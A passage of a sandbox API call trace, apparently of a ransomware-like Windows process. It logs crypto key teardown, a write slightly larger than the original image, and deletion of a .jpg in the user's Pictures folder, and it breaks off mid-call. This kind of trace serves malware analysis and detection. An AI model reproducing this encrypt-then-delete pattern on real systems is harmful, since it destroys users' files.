| out: lpMsg=0x8ceef8) returned 0 [0210.126] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.127] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.127] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.127] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.127] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.127] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.127] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.127] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.127] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.129] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.136] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.137] WriteFile (in: hFile=0x520, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xfb80, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xfb80, lpOverlapped=0x0) returned 1 [0210.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.139] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.139] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.139] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.139] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.139] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.139] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.139] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.139] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.139] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.139] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.139] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0210.139] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab008, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.140] CryptDestroyKey (hKey=0x9e2078) returned 1 [0210.140] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.140] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.140] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.140] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.140] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.140] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.140] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.140] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.140] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.140] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.140] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.140] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.140] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.140] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.141] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.141] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.141] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.141] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.141] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.141] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.141] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.141] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.141] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.141] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.141] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.141] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0210.141] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.141] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f80, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0210.142] CryptReleaseContext (hProv=0xa7c3b8, dwFlags=0x0) returned 1 [0210.142] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.142] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0210.142] FreeLibrary (hLibModule=0x76390000) returned 1 [0210.142] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.143] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0210.143] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.143] CloseHandle (hObject=0x4dc) returned 1 [0210.145] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.145] CloseHandle (hObject=0x520) returned 1 [0210.147] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.149] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.149] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.149] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.149] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/FS3WVwrvnLekT9.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\FS3WVwrvnLekT9.jpg", lpFilePart=0x8cedf4*="FS3WVwrvnLekT9.jpg") returned 0x2b [0210.150] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\FS3WVwrvnLekT9.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\fs3wvwrvnlekt9.jpg")) returned 0x20 [0210.150] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\FS3WVwrvnLekT9.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906bfc10, ftCreationTime.dwHighDateTime=0x1d5d32e, ftLastAccessTime.dwLowDateTime=0xc047fd0, ftLastAccessTime.dwHighDateTime=0x1d5cb3e, ftLastWriteTime.dwLowDateTime=0xc047fd0, ftLastWriteTime.dwHighDateTime=0x1d5cb3e, nFileSizeHigh=0x0, nFileSizeLow=0xfb7e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="FS3WVwrvnLekT9.jpg", cAlternateFileName="FS3WVW~1.JPG")) returned 0x9e1bf8 [0210.150] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\FS3WVwrvnLekT9.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\fs3wvwrvnlekt9.jpg")) returned 1 [0210.152] FindNextFileW (in: hFindFile=0x9e1bf8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x906bfc10, ftCreationTime.dwHighDateTime=0x1d5d32e, ftLastAccessTime.dwLowDateTime=0xc047fd0, ftLastAccessTime.dwHighDateTime=0x1d5cb3e, ftLastWriteTime.dwLowDateTime=0xc047fd0, ftLastWriteTime.dwHighDateTime=0x1d5cb3e, nFileSizeHigh=0x0, nFileSizeLow=0xfb7e, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="FS3WVwrvnLekT9.jpg", cAlternateFileName="FS3WVW~1.JPG")) returned 0 [0210.152] FindClose (in: hFindFile=0x9e1bf8 | out: hFindFile=0x9e1bf8) returned 1 [0210.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0210.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0210.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.153] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0210.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0210.153] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6d8 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0210.153] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0210.153] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0210.153] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0210.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0210.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7160 [0210.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0210.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0210.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0210.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.154] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0210.154] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.155] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x58) returned 0x2a5f720 [0210.155] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/FS3WVwrvnLekT9.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\FS3WVwrvnLekT9.jpg", lpFilePart=0x8cf650*="FS3WVwrvnLekT9.jpg") returned 0x2b [0210.155] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f720 | out: hHeap=0x2af0000) returned 1 [0210.155] GetFileAttributesW 